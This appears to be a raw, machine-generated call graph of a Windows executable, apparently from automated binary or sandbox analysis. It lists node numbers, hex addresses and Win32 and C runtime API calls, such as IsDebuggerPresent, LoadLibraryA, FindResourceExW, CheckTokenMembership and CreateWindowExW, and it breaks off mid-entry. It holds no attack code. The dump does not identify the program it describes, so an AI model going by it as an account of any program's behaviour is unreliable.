104480->104399 104481->104396 104483 c45201 104482->104483 104488 c4521c 104482->104488 104484 c4520d 104483->104484 104483->104488 104491 c38b28 58 API calls __getptd_noexit 104484->104491 104486 c4522c RtlAllocateHeap 104487 c45212 104486->104487 104486->104488 104487->104474 104488->104486 104488->104487 104492 c333a1 DecodePointer 104488->104492 104490->104478 104491->104487 104492->104488 104493->104414 104494->104408 104495->104407 104496->104423 104497->104428 104498->104439 104500 c38dd1 104499->104500 104505 c38c59 104500->104505 104504 c38dec 104504->104442 104506 c38c73 _memset ___raise_securityfailure 104505->104506 104507 c38c93 IsDebuggerPresent 104506->104507 104513 c3a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104507->104513 104510 c38d57 ___raise_securityfailure 104514 c3c5f6 104510->104514 104511 c38d7a 104512 c3a140 GetCurrentProcess TerminateProcess 104511->104512 104512->104504 104513->104510 104515 c3c600 IsProcessorFeaturePresent 104514->104515 104516 c3c5fe 104514->104516 104518 c4590a 104515->104518 104516->104511 104521 c458b9 5 API calls ___raise_securityfailure 104518->104521 104520 c459ed 104520->104511 104521->104520 104523 c3a4d4 EncodePointer 104522->104523 104523->104523 104524 c3a4ee 104523->104524 104524->104446 104526 c39c0b __lock 58 API calls 104525->104526 104527 c33377 DecodePointer EncodePointer 104526->104527 104590 c39d75 LeaveCriticalSection 104527->104590 104529 c14849 104530 c333d4 104529->104530 104531 c333f8 104530->104531 104532 c333de 104530->104532 104531->104455 104532->104531 104591 c38b28 58 API calls __getptd_noexit 104532->104591 104534 c333e8 104592 c38db6 9 API calls __wtof_l 104534->104592 104536 c333f3 104536->104455 104537->104457 104539 c13b47 __ftell_nolock 104538->104539 104540 c17667 59 API calls 104539->104540 104541 c13b51 GetCurrentDirectoryW 104540->104541 104593 c13766 104541->104593 104543 c13b7a IsDebuggerPresent 104544 c4d272 MessageBoxA 104543->104544 104545 c13b88 104543->104545 104547 c4d28c 104544->104547 104545->104547 104548 c13ba5 104545->104548 104577 c13c61 104545->104577 104546 c13c68 SetCurrentDirectoryW 104552 c13c75 Mailbox 104546->104552 104792 c17213 59 API calls Mailbox 104547->104792 104674 c17285 104548->104674 104552->104459 104553 c13bc3 GetFullPathNameW 104555 c17bcc 59 API calls 104553->104555 104554 c4d29c 104557 c4d2b2 SetCurrentDirectoryW 104554->104557 104556 c13bfe 104555->104556 104690 c2092d 104556->104690 104557->104552 104560 c13c1c 104561 c13c26 104560->104561 104793 c6874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104560->104793 104706 c13a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104561->104706 104564 c4d2cf 104564->104561 104568 c4d2e0 104564->104568 104794 c14706 104568->104794 104577->104546 104590->104529 104591->104534 104592->104536 104594 c17667 59 API calls 104593->104594 104595 c1377c 104594->104595 104805 c13d31 104595->104805 104597 c1379a 104598 c14706 61 API calls 104597->104598 104599 c137ae 104598->104599 104600 c17de1 59 API calls 104599->104600 104601 c137bb 104600->104601 104819 c14ddd 104601->104819 104604 c4d173 104886 c7955b 104604->104886 104605 c137dc Mailbox 104609 c18047 59 API calls 104605->104609 104608 c4d192 104611 c32d55 _free 58 API calls 104608->104611 104612 c137ef 104609->104612 104613 c4d19f 104611->104613 104843 c1928a 104612->104843 104615 c14e4a 84 API calls 104613->104615 104617 c4d1a8 104615->104617 104621 c13ed0 59 API calls 104617->104621 104618 c17de1 59 API calls 104619 c13808 104618->104619 104846 c184c0 104619->104846 104623 c4d1c3 104621->104623 104622 c1381a Mailbox 104624 c17de1 59 API calls 104622->104624 104625 c13ed0 59 API calls 104623->104625 104626 c13840 104624->104626 104627 c4d1df 104625->104627 104628 c184c0 69 API calls 104626->104628 104629 c14706 61 API calls 104627->104629 104631 c1384f Mailbox 104628->104631 104630 c4d204 104629->104630 104632 c13ed0 59 API calls 104630->104632 104634 c17667 59 API calls 104631->104634 104633 c4d210 104632->104633 104635 c18047 59 API calls 104633->104635 104636 c1386d 104634->104636 104637 c4d21e 104635->104637 104850 c13ed0 104636->104850 104639 c13ed0 59 API calls 104637->104639 104641 c4d22d 104639->104641 104647 c18047 59 API calls 104641->104647 104643 c13887 104643->104617 104644 c13891 104643->104644 104645 c32efd _W_store_winword 60 API calls 104644->104645 104646 c1389c 104645->104646 104646->104623 104648 c138a6 104646->104648 104649 c4d24f 104647->104649 104650 c32efd _W_store_winword 60 API calls 104648->104650 104651 c13ed0 59 API calls 104649->104651 104652 c138b1 104650->104652 104653 c4d25c 104651->104653 104652->104627 104654 c138bb 104652->104654 104653->104653 104655 c32efd _W_store_winword 60 API calls 104654->104655 104656 c138c6 104655->104656 104656->104641 104657 c13907 104656->104657 104659 c13ed0 59 API calls 104656->104659 104657->104641 104658 c13914 104657->104658 104866 c192ce 104658->104866 104661 c138ea 104659->104661 104663 c18047 59 API calls 104661->104663 104665 c138f8 104663->104665 104667 c13ed0 59 API calls 104665->104667 104667->104657 104669 c1928a 59 API calls 104671 c1394f 104669->104671 104670 c18ee0 60 API calls 104670->104671 104671->104669 104671->104670 104672 c13ed0 59 API calls 104671->104672 104673 c13995 Mailbox 104671->104673 104672->104671 104673->104543 104675 c17292 __ftell_nolock 104674->104675 104676 c172ab 104675->104676 104677 c4ea22 _memset 104675->104677 105751 c14750 104676->105751 104679 c4ea3e GetOpenFileNameW 104677->104679 104681 c4ea8d 104679->104681 104683 c17bcc 59 API calls 104681->104683 104686 c4eaa2 104683->104686 104686->104686 104687 c172c9 105779 c1686a 104687->105779 104691 c2093a __ftell_nolock 104690->104691 106090 c16d80 104691->106090 104693 c2093f 104705 c13c14 104693->104705 106101 c2119e 89 API calls 104693->106101 104695 c2094c 104695->104705 106102 c23ee7 91 API calls Mailbox 104695->106102 104697 c20955 104698 c20959 GetFullPathNameW 104697->104698 104697->104705 104699 c17bcc 59 API calls 104698->104699 104700 c20985 104699->104700 104705->104554 104705->104560 104707 c13ab0 LoadImageW RegisterClassExW 104706->104707 104708 c4d261 104706->104708 106139 c13041 7 API calls 104707->106139 106140 c147a0 LoadImageW EnumResourceNamesW 104708->106140 104711 c4d26a 104712 c13b34 104713 c139d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104712->104713 104792->104554 104793->104564 104795 c41940 __ftell_nolock 104794->104795 104796 c14713 GetModuleFileNameW 104795->104796 104806 c13d3e __ftell_nolock 104805->104806 104807 c13ea4 Mailbox 104806->104807 104808 c17bcc 59 API calls 104806->104808 104807->104597 104810 c13d70 104808->104810 104818 c13da6 Mailbox 104810->104818 104927 c179f2 104810->104927 104811 c179f2 59 API calls 104811->104818 104812 c13e77 104812->104807 104813 c17de1 59 API calls 104812->104813 104815 c13e98 104813->104815 104814 c17de1 59 API calls 104814->104818 104816 c13f74 59 API calls 104815->104816 104816->104807 104818->104807 104818->104811 104818->104812 104818->104814 104930 c13f74 104818->104930 104936 c14bb5 104819->104936 104824 c4d8e6 104827 c14e4a 84 API calls 104824->104827 104825 c14e08 LoadLibraryExW 104946 c14b6a 104825->104946 104829 c4d8ed 104827->104829 104830 c14b6a 3 API calls 104829->104830 104832 c4d8f5 104830->104832 104972 c14f0b 104832->104972 104833 c14e2f 104833->104832 104834 c14e3b 104833->104834 104836 c14e4a 84 API calls 104834->104836 104838 c137d4 104836->104838 104838->104604 104838->104605 104840 c4d91c 104980 c14ec7 104840->104980 104842 c4d929 104844 c30db6 Mailbox 59 API calls 104843->104844 104845 c137fb 104844->104845 104845->104618 104847 c184cb 104846->104847 104849 c184f2 104847->104849 105410 c189b3 69 API calls Mailbox 104847->105410 104849->104622 104851 c13ef3 104850->104851 104852 c13eda 104850->104852 104853 c17bcc 59 API calls 104851->104853 104854 c18047 59 API calls 104852->104854 104855 c13879 104853->104855 104854->104855 104856 c32efd 104855->104856 104857 c32f09 104856->104857 104858 c32f7e 104856->104858 104865 c32f2e 104857->104865 105411 c38b28 58 API calls __getptd_noexit 104857->105411 105413 c32f90 60 API calls 3 library calls 104858->105413 104861 c32f8b 104861->104643 104862 c32f15 105412 c38db6 9 API calls __wtof_l 104862->105412 104864 c32f20 104864->104643 104865->104643 104867 c192d6 104866->104867 104868 c30db6 Mailbox 59 API calls 104867->104868 104869 c192e4 104868->104869 104870 c13924 104869->104870 105414 c191fc 59 API calls Mailbox 104869->105414 104872 c19050 104870->104872 105415 c19160 104872->105415 104874 c1905f 104875 c30db6 Mailbox 59 API calls 104874->104875 104876 c13932 104874->104876 104875->104876 104877 c18ee0 104876->104877 104878 c4f17c 104877->104878 104880 c18ef7 104877->104880 104878->104880 105425 c18bdb 59 API calls Mailbox 104878->105425 104881 c19040 104880->104881 104882 c18ff8 104880->104882 104885 c18fff 104880->104885 105424 c19d3c 60 API calls Mailbox 104881->105424 104884 c30db6 Mailbox 59 API calls 104882->104884 104884->104885 104885->104671 104887 c14ee5 85 API calls 104886->104887 104888 c795ca 104887->104888 105426 c79734 104888->105426 104891 c14f0b 74 API calls 104892 c795f7 104891->104892 104893 c14f0b 74 API calls 104892->104893 104894 c79607 104893->104894 104895 c14f0b 74 API calls 104894->104895 104896 c79622 104895->104896 104897 c14f0b 74 API calls 104896->104897 104898 c7963d 104897->104898 104899 c14ee5 85 API calls 104898->104899 104900 c79654 104899->104900 104901 c3571c __crtCompareStringA_stat 58 API calls 104900->104901 104902 c7965b 104901->104902 104903 c3571c __crtCompareStringA_stat 58 API calls 104902->104903 104904 c79665 104903->104904 104905 c14f0b 74 API calls 104904->104905 104906 c79679 104905->104906 104907 c79109 GetSystemTimeAsFileTime 104906->104907 104908 c7968c 104907->104908 104909 c796b6 104908->104909 104910 c796a1 104908->104910 104912 c796bc 104909->104912 104913 c7971b 104909->104913 104911 c32d55 _free 58 API calls 104910->104911 104915 c796a7 104911->104915 105432 c78b06 104912->105432 104914 c32d55 _free 58 API calls 104913->104914 104917 c4d186 104914->104917 104918 c32d55 _free 58 API calls 104915->104918 104917->104608 104921 c14e4a 104917->104921 104918->104917 104920 c32d55 _free 58 API calls 104920->104917 104922 c14e54 104921->104922 104924 c14e5b 104921->104924 104923 c353a6 __fcloseall 83 API calls 104922->104923 104923->104924 104925 c14e7b FreeLibrary 104924->104925 104926 c14e6a 104924->104926 104925->104926 104926->104608 104928 c17e4f 59 API calls 104927->104928 104929 c179fd 104928->104929 104929->104810 104931 c13f82 104930->104931 104935 c13fa4 _memmove 104930->104935 104934 c30db6 Mailbox 59 API calls 104931->104934 104932 c30db6 Mailbox 59 API calls 104933 c13fb8 104932->104933 104933->104818 104934->104935 104935->104932 104985 c14c03 104936->104985 104939 c14bdc 104941 c14bf5 104939->104941 104942 c14bec FreeLibrary 104939->104942 104940 c14c03 2 API calls 104940->104939 104943 c3525b 104941->104943 104942->104941 104989 c35270 104943->104989 104945 c14dfc 104945->104824 104945->104825 105147 c14c36 104946->105147 104949 c14c36 2 API calls 104952 c14b8f 104949->104952 104950 c14ba1 FreeLibrary 104951 c14baa 104950->104951 104953 c14c70 104951->104953 104952->104950 104952->104951 104954 c30db6 Mailbox 59 API calls 104953->104954 104955 c14c85 104954->104955 105151 c1522e 104955->105151 104957 c14c91 _memmove 104958 c14ccc 104957->104958 104959 c14dc1 104957->104959 104960 c14d89 104957->104960 104961 c14ec7 69 API calls 104958->104961 105165 c7991b 95 API calls 104959->105165 105154 c14e89 CreateStreamOnHGlobal 104960->105154 104969 c14cd5 104961->104969 104964 c14f0b 74 API calls 104964->104969 104965 c14d69 104965->104833 104967 c4d8a7 104968 c14ee5 85 API calls 104967->104968 104970 c4d8bb 104968->104970 104969->104964 104969->104965 104969->104967 105160 c14ee5 104969->105160 104971 c14f0b 74 API calls 104970->104971 104971->104965 104973 c14f1d 104972->104973 104975 c4d9cd 104972->104975 105189 c355e2 104973->105189 104977 c79109 105387 c78f5f 104977->105387 104979 c7911f 104979->104840 104981 c4d990 104980->104981 104982 c14ed6 104980->104982 105392 c35c60 104982->105392 104984 c14ede 104984->104842 104986 c14bd0 104985->104986 104987 c14c0c LoadLibraryA 104985->104987 104986->104939 104986->104940 104987->104986 104988 c14c1d GetProcAddress 104987->104988 104988->104986 104991 c3527c __close 104989->104991 104990 c3528f 105038 c38b28 58 API calls __getptd_noexit 104990->105038 104991->104990 104993 c352c0 104991->104993 105008 c404e8 104993->105008 104994 c35294 105039 c38db6 9 API calls __wtof_l 104994->105039 104997 c352c5 104998 c352db 104997->104998 104999 c352ce 104997->104999 105001 c35305 104998->105001 105002 c352e5 104998->105002 105040 c38b28 58 API calls __getptd_noexit 104999->105040 105023 c40607 105001->105023 105041 c38b28 58 API calls __getptd_noexit 105002->105041 105003 c3529f __close @_EH4_CallFilterFunc@8 105003->104945 105009 c404f4 __close 105008->105009 105010 c39c0b __lock 58 API calls 105009->105010 105021 c40502 105010->105021 105011 c4057d 105048 c3881d 58 API calls 2 library calls 105011->105048 105014 c405f3 __close 105014->104997 105015 c40584 105020 c40576 105015->105020 105049 c39e2b InitializeCriticalSectionAndSpinCount 105015->105049 105018 c39c93 __mtinitlocknum 58 API calls 105018->105021 105019 c405aa EnterCriticalSection 105019->105020 105043 c405fe 105020->105043 105021->105011 105021->105018 105021->105020 105046 c36c50 59 API calls __lock 105021->105046 105047 c36cba LeaveCriticalSection LeaveCriticalSection _doexit 105021->105047 105032 c40627 __wopenfile 105023->105032 105024 c40641 105054 c38b28 58 API calls __getptd_noexit 105024->105054 105025 c407fc 105025->105024 105029 c4085f 105025->105029 105027 c40646 105055 c38db6 9 API calls __wtof_l 105027->105055 105051 c485a1 105029->105051 105030 c35310 105042 c35332 LeaveCriticalSection LeaveCriticalSection _fseek 105030->105042 105032->105024 105032->105025 105056 c337cb 60 API calls 2 library calls 105032->105056 105034 c407f5 105034->105025 105057 c337cb 60 API calls 2 library calls 105034->105057 105036 c40814 105036->105025 105058 c337cb 60 API calls 2 library calls 105036->105058 105038->104994 105039->105003 105040->105003 105041->105003 105042->105003 105050 c39d75 LeaveCriticalSection 105043->105050 105045 c40605 105045->105014 105046->105021 105047->105021 105048->105015 105049->105019 105050->105045 105059 c47d85 105051->105059 105053 c485ba 105053->105030 105054->105027 105055->105030 105056->105034 105057->105036 105058->105025 105061 c47d91 __close 105059->105061 105060 c47da7 105144 c38b28 58 API calls __getptd_noexit 105060->105144 105061->105060 105064 c47ddd 105061->105064 105063 c47dac 105145 c38db6 9 API calls __wtof_l 105063->105145 105070 c47e4e 105064->105070 105067 c47df9 105146 c47e22 LeaveCriticalSection __unlock_fhandle 105067->105146 105069 c47db6 __close 105069->105053 105071 c47e6e 105070->105071 105072 c344ea __wsopen_nolock 58 API calls 105071->105072 105074 c47e8a 105072->105074 105073 c38dc6 __invoke_watson 8 API calls 105075 c485a0 105073->105075 105076 c47ec4 105074->105076 105087 c47ee7 105074->105087 105143 c47fc1 105074->105143 105077 c47d85 __wsopen_helper 103 API calls 105075->105077 105078 c38af4 __wsopen_nolock 58 API calls 105076->105078 105079 c485ba 105077->105079 105080 c47ec9 105078->105080 105079->105067 105081 c38b28 __wtof_l 58 API calls 105080->105081 105082 c47ed6 105081->105082 105084 c38db6 __wtof_l 9 API calls 105082->105084 105083 c47fa5 105085 c38af4 __wsopen_nolock 58 API calls 105083->105085 105086 c47ee0 105084->105086 105088 c47faa 105085->105088 105086->105067 105087->105083 105091 c47f83 105087->105091 105089 c38b28 __wtof_l 58 API calls 105088->105089 105090 c47fb7 105089->105090 105092 c38db6 __wtof_l 9 API calls 105090->105092 105093 c3d294 __alloc_osfhnd 61 API calls 105091->105093 105092->105143 105094 c48051 105093->105094 105095 c4807e 105094->105095 105096 c4805b 105094->105096 105098 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105095->105098 105097 c38af4 __wsopen_nolock 58 API calls 105096->105097 105099 c48060 105097->105099 105109 c480a0 105098->105109 105100 c38b28 __wtof_l 58 API calls 105099->105100 105102 c4806a 105100->105102 105101 c4811e GetFileType 105103 c48129 GetLastError 105101->105103 105104 c4816b 105101->105104 105107 c38b28 __wtof_l 58 API calls 105102->105107 105108 c38b07 __dosmaperr 58 API calls 105103->105108 105114 c3d52a __set_osfhnd 59 API calls 105104->105114 105105 c480ec GetLastError 105106 c38b07 __dosmaperr 58 API calls 105105->105106 105111 c48111 105106->105111 105107->105086 105112 c48150 CloseHandle 105108->105112 105109->105101 105109->105105 105110 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105109->105110 105113 c480e1 105110->105113 105116 c38b28 __wtof_l 58 API calls 105111->105116 105112->105111 105115 c4815e 105112->105115 105113->105101 105113->105105 105119 c48189 105114->105119 105117 c38b28 __wtof_l 58 API calls 105115->105117 105116->105143 105118 c48163 105117->105118 105118->105111 105120 c48344 105119->105120 105121 c418c1 __lseeki64_nolock 60 API calls 105119->105121 105128 c4820a 105119->105128 105122 c48517 CloseHandle 105120->105122 105120->105143 105123 c481f3 105121->105123 105124 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105122->105124 105127 c38af4 __wsopen_nolock 58 API calls 105123->105127 105123->105128 105126 c4853e 105124->105126 105125 c40e5b 70 API calls __read_nolock 105125->105128 105129 c48546 GetLastError 105126->105129 105136 c48572 105126->105136 105127->105128 105128->105120 105128->105125 105132 c40add __close_nolock 61 API calls 105128->105132 105135 c4823c 105128->105135 105137 c3d886 __write 78 API calls 105128->105137 105138 c483c1 105128->105138 105141 c418c1 60 API calls __lseeki64_nolock 105128->105141 105130 c38b07 __dosmaperr 58 API calls 105129->105130 105131 c48552 105130->105131 105134 c3d43d __free_osfhnd 59 API calls 105131->105134 105132->105128 105133 c497a2 __chsize_nolock 82 API calls 105133->105135 105134->105136 105135->105128 105135->105133 105136->105143 105137->105128 105139 c40add __close_nolock 61 API calls 105138->105139 105140 c483c8 105139->105140 105142 c38b28 __wtof_l 58 API calls 105140->105142 105141->105128 105142->105143 105143->105073 105144->105063 105145->105069 105146->105069 105148 c14b83 105147->105148 105149 c14c3f LoadLibraryA 105147->105149 105148->104949 105148->104952 105149->105148 105150 c14c50 GetProcAddress 105149->105150 105150->105148 105152 c30db6 Mailbox 59 API calls 105151->105152 105153 c15240 105152->105153 105153->104957 105155 c14ea3 FindResourceExW 105154->105155 105159 c14ec0 105154->105159 105156 c4d933 LoadResource 105155->105156 105155->105159 105157 c4d948 SizeofResource 105156->105157 105156->105159 105158 c4d95c LockResource 105157->105158 105157->105159 105158->105159 105159->104958 105161 c14ef4 105160->105161 105162 c4d9ab 105160->105162 105166 c3584d 105161->105166 105164 c14f02 105164->104969 105165->104958 105167 c35859 __close 105166->105167 105168 c3586b 105167->105168 105170 c35891 105167->105170 105179 c38b28 58 API calls __getptd_noexit 105168->105179 105181 c36c11 105170->105181 105171 c35870 105180 c38db6 9 API calls __wtof_l 105171->105180 105174 c35897 105187 c357be 83 API calls 5 library calls 105174->105187 105176 c358a6 105188 c358c8 LeaveCriticalSection LeaveCriticalSection _fseek 105176->105188 105177 c3587b __close 105177->105164 105179->105171 105180->105177 105182 c36c43 EnterCriticalSection 105181->105182 105183 c36c21 105181->105183 105184 c36c39 105182->105184 105183->105182 105185 c36c29 105183->105185 105184->105174 105186 c39c0b __lock 58 API calls 105185->105186 105186->105184 105187->105176 105188->105177 105192 c355fd 105189->105192 105191 c14f2e 105191->104977 105193 c35609 __close 105192->105193 105194 c3564c 105193->105194 105195 c35644 __close 105193->105195 105198 c3561f _memset 105193->105198 105196 c36c11 __lock_file 59 API calls 105194->105196 105195->105191 105197 c35652 105196->105197 105205 c3541d 105197->105205 105219 c38b28 58 API calls __getptd_noexit 105198->105219 105201 c35639 105220 c38db6 9 API calls __wtof_l 105201->105220 105206 c35453 105205->105206 105209 c35438 _memset 105205->105209 105221 c35686 LeaveCriticalSection LeaveCriticalSection _fseek 105206->105221 105207 c35443 105317 c38b28 58 API calls __getptd_noexit 105207->105317 105209->105206 105209->105207 105212 c35493 105209->105212 105212->105206 105215 c355a4 _memset 105212->105215 105222 c346e6 105212->105222 105229 c40e5b 105212->105229 105297 c40ba7 105212->105297 105319 c40cc8 58 API calls 3 library calls 105212->105319 105320 c38b28 58 API calls __getptd_noexit 105215->105320 105218 c35448 105318 c38db6 9 API calls __wtof_l 105218->105318 105219->105201 105220->105195 105221->105195 105223 c346f0 105222->105223 105224 c34705 105222->105224 105321 c38b28 58 API calls __getptd_noexit 105223->105321 105224->105212 105226 c346f5 105322 c38db6 9 API calls __wtof_l 105226->105322 105228 c34700 105228->105212 105230 c40e7c 105229->105230 105233 c40e93 105229->105233 105332 c38af4 58 API calls __getptd_noexit 105230->105332 105232 c415cb 105348 c38af4 58 API calls __getptd_noexit 105232->105348 105233->105232 105238 c40ecd 105233->105238 105235 c40e81 105333 c38b28 58 API calls __getptd_noexit 105235->105333 105236 c415d0 105349 c38b28 58 API calls __getptd_noexit 105236->105349 105240 c40ed5 105238->105240 105246 c40eec 105238->105246 105334 c38af4 58 API calls __getptd_noexit 105240->105334 105241 c40ee1 105350 c38db6 9 API calls __wtof_l 105241->105350 105243 c40eda 105335 c38b28 58 API calls __getptd_noexit 105243->105335 105245 c40f01 105336 c38af4 58 API calls __getptd_noexit 105245->105336 105246->105245 105249 c40f1b 105246->105249 105250 c40f39 105246->105250 105277 c40e88 105246->105277 105249->105245 105254 c40f26 105249->105254 105337 c3881d 58 API calls 2 library calls 105250->105337 105252 c40f49 105255 c40f51 105252->105255 105256 c40f6c 105252->105256 105323 c45c6b 105254->105323 105338 c38b28 58 API calls __getptd_noexit 105255->105338 105340 c418c1 60 API calls 3 library calls 105256->105340 105257 c4103a 105259 c410b3 ReadFile 105257->105259 105264 c41050 GetConsoleMode 105257->105264 105262 c410d5 105259->105262 105263 c41593 GetLastError 105259->105263 105261 c40f56 105339 c38af4 58 API calls __getptd_noexit 105261->105339 105262->105263 105270 c410a5 105262->105270 105266 c41093 105263->105266 105267 c415a0 105263->105267 105268 c41064 105264->105268 105269 c410b0 105264->105269 105279 c41099 105266->105279 105341 c38b07 58 API calls 3 library calls 105266->105341 105346 c38b28 58 API calls __getptd_noexit 105267->105346 105268->105269 105272 c4106a ReadConsoleW 105268->105272 105269->105259 105270->105279 105280 c4110a 105270->105280 105281 c41377 105270->105281 105272->105270 105275 c4108d GetLastError 105272->105275 105274 c415a5 105347 c38af4 58 API calls __getptd_noexit 105274->105347 105275->105266 105277->105212 105278 c32d55 _free 58 API calls 105278->105277 105279->105277 105279->105278 105283 c41176 ReadFile 105280->105283 105289 c411f7 105280->105289 105281->105279 105287 c4147d ReadFile 105281->105287 105284 c41197 GetLastError 105283->105284 105293 c411a1 105283->105293 105284->105293 105285 c412b4 105291 c41264 MultiByteToWideChar 105285->105291 105344 c418c1 60 API calls 3 library calls 105285->105344 105286 c412a4 105343 c38b28 58 API calls __getptd_noexit 105286->105343 105288 c414a0 GetLastError 105287->105288 105296 c414ae 105287->105296 105288->105296 105289->105279 105289->105285 105289->105286 105289->105291 105291->105275 105291->105279 105293->105280 105342 c418c1 60 API calls 3 library calls 105293->105342 105296->105281 105345 c418c1 60 API calls 3 library calls 105296->105345 105298 c40bb2 105297->105298 105301 c40bc7 105297->105301 105384 c38b28 58 API calls __getptd_noexit 105298->105384 105300 c40bb7 105385 c38db6 9 API calls __wtof_l 105300->105385 105303 c40bfc 105301->105303 105310 c40bc2 105301->105310 105386 c45fe4 58 API calls __malloc_crt 105301->105386 105305 c346e6 __fseek_nolock 58 API calls 105303->105305 105306 c40c10 105305->105306 105351 c40d47 105306->105351 105308 c40c17 105309 c346e6 __fseek_nolock 58 API calls 105308->105309 105308->105310 105311 c40c3a 105309->105311 105310->105212 105311->105310 105312 c346e6 __fseek_nolock 58 API calls 105311->105312 105313 c40c46 105312->105313 105313->105310 105314 c346e6 __fseek_nolock 58 API calls 105313->105314 105315 c40c53 105314->105315 105316 c346e6 __fseek_nolock 58 API calls 105315->105316 105316->105310 105317->105218 105318->105206 105319->105212 105320->105218 105321->105226 105322->105228 105324 c45c76 105323->105324 105325 c45c83 105323->105325 105326 c38b28 __wtof_l 58 API calls 105324->105326 105327 c45c8f 105325->105327 105328 c38b28 __wtof_l 58 API calls 105325->105328 105329 c45c7b 105326->105329 105327->105257 105330 c45cb0 105328->105330 105329->105257 105331 c38db6 __wtof_l 9 API calls 105330->105331 105331->105329 105332->105235 105333->105277 105334->105243 105335->105241 105336->105243 105337->105252 105338->105261 105339->105277 105340->105254 105341->105279 105342->105293 105343->105279 105344->105291 105345->105296 105346->105274 105347->105279 105348->105236 105349->105241 105350->105277 105352 c40d53 __close 105351->105352 105353 c40d77 105352->105353 105354 c40d60 105352->105354 105356 c40e3b 105353->105356 105359 c40d8b 105353->105359 105355 c38af4 __wsopen_nolock 58 API calls 105354->105355 105358 c40d65 105355->105358 105357 c38af4 __wsopen_nolock 58 API calls 105356->105357 105360 c40dae 105357->105360 105361 c38b28 __wtof_l 58 API calls 105358->105361 105362 c40db6 105359->105362 105363 c40da9 105359->105363 105368 c38b28 __wtof_l 58 API calls 105360->105368 105376 c40d6c __close 105361->105376 105365 c40dc3 105362->105365 105366 c40dd8 105362->105366 105364 c38af4 __wsopen_nolock 58 API calls 105363->105364 105364->105360 105369 c38af4 __wsopen_nolock 58 API calls 105365->105369 105367 c3d206 ___lock_fhandle 59 API calls 105366->105367 105371 c40dde 105367->105371 105372 c40dd0 105368->105372 105370 c40dc8 105369->105370 105373 c38b28 __wtof_l 58 API calls 105370->105373 105374 c40e04 105371->105374 105375 c40df1 105371->105375 105378 c38db6 __wtof_l 9 API calls 105372->105378 105373->105372 105379 c38b28 __wtof_l 58 API calls 105374->105379 105377 c40e5b __read_nolock 70 API calls 105375->105377 105376->105308 105380 c40dfd 105377->105380 105378->105376 105381 c40e09 105379->105381 105383 c40e33 __read LeaveCriticalSection 105380->105383 105382 c38af4 __wsopen_nolock 58 API calls 105381->105382 105382->105380 105383->105376 105384->105300 105385->105310 105386->105303 105390 c3520a GetSystemTimeAsFileTime 105387->105390 105389 c78f6e 105389->104979 105391 c35238 __aulldiv 105390->105391 105391->105389 105393 c35c6c __close 105392->105393 105394 c35c93 105393->105394 105395 c35c7e 105393->105395 105396 c36c11 __lock_file 59 API calls 105394->105396 105406 c38b28 58 API calls __getptd_noexit 105395->105406 105398 c35c99 105396->105398 105408 c358d0 67 API calls 6 library calls 105398->105408 105399 c35c83 105407 c38db6 9 API calls __wtof_l 105399->105407 105402 c35c8e __close 105402->104984 105403 c35ca4 105409 c35cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105403->105409 105405 c35cb6 105405->105402 105406->105399 105407->105402 105408->105403 105409->105405 105410->104849 105411->104862 105412->104864 105413->104861 105414->104870 105416 c19169 Mailbox 105415->105416 105417 c4f19f 105416->105417 105422 c19173 105416->105422 105418 c30db6 Mailbox 59 API calls 105417->105418 105420 c4f1ab 105418->105420 105419 c1917a 105419->104874 105420->105420 105422->105419 105423 c19c90 59 API calls Mailbox 105422->105423 105423->105422 105424->104885 105425->104880 105430 c79748 __tzset_nolock _wcscmp 105426->105430 105427 c795dc 105427->104891 105427->104917 105428 c79109 GetSystemTimeAsFileTime 105428->105430 105429 c14ee5 85 API calls 105429->105430 105430->105427 105430->105428 105430->105429 105431 c14f0b 74 API calls 105430->105431 105431->105430 105433 c78b11 105432->105433 105434 c78b1f 105432->105434 105435 c3525b 115 API calls 105433->105435 105436 c78b64 105434->105436 105437 c3525b 115 API calls 105434->105437 105462 c78b28 105434->105462 105435->105434 105463 c78d91 105436->105463 105439 c78b49 105437->105439 105439->105436 105441 c78b52 105439->105441 105440 c78ba8 105442 c78bcd 105440->105442 105443 c78bac 105440->105443 105445 c353a6 __fcloseall 83 API calls 105441->105445 105441->105462 105467 c789a9 105442->105467 105444 c78bb9 105443->105444 105447 c353a6 __fcloseall 83 API calls 105443->105447 105451 c353a6 __fcloseall 83 API calls 105444->105451 105444->105462 105445->105462 105447->105444 105449 c78bfb 105476 c78c2b 105449->105476 105450 c78bdb 105452 c78be8 105450->105452 105454 c353a6 __fcloseall 83 API calls 105450->105454 105451->105462 105456 c353a6 __fcloseall 83 API calls 105452->105456 105452->105462 105454->105452 105456->105462 105459 c78c16 105461 c353a6 __fcloseall 83 API calls 105459->105461 105459->105462 105461->105462 105462->104920 105464 c78db6 105463->105464 105466 c78d9f __tzset_nolock _memmove 105463->105466 105465 c355e2 __fread_nolock 74 API calls 105464->105465 105465->105466 105466->105440 105468 c3571c __crtCompareStringA_stat 58 API calls 105467->105468 105469 c789b8 105468->105469 105470 c3571c __crtCompareStringA_stat 58 API calls 105469->105470 105471 c789cc 105470->105471 105472 c3571c __crtCompareStringA_stat 58 API calls 105471->105472 105473 c789e0 105472->105473 105474 c78d0d 58 API calls 105473->105474 105475 c789f3 105473->105475 105474->105475 105475->105449 105475->105450 105483 c78c40 105476->105483 105477 c78cf8 105509 c78f35 105477->105509 105479 c78c02 105484 c78d0d 105479->105484 105480 c78a05 74 API calls 105480->105483 105483->105477 105483->105479 105483->105480 105505 c78e12 105483->105505 105513 c78aa1 74 API calls 105483->105513 105485 c78d20 105484->105485 105486 c78d1a 105484->105486 105488 c32d55 _free 58 API calls 105485->105488 105489 c78d31 105485->105489 105487 c32d55 _free 58 API calls 105486->105487 105487->105485 105488->105489 105490 c32d55 _free 58 API calls 105489->105490 105491 c78c09 105489->105491 105490->105491 105491->105459 105492 c353a6 105491->105492 105493 c353b2 __close 105492->105493 105494 c353c6 105493->105494 105496 c353de 105493->105496 105562 c38b28 58 API calls __getptd_noexit 105494->105562 105498 c36c11 __lock_file 59 API calls 105496->105498 105501 c353d6 __close 105496->105501 105497 c353cb 105563 c38db6 9 API calls __wtof_l 105497->105563 105500 c353f0 105498->105500 105546 c3533a 105500->105546 105501->105459 105506 c78e21 105505->105506 105507 c78e61 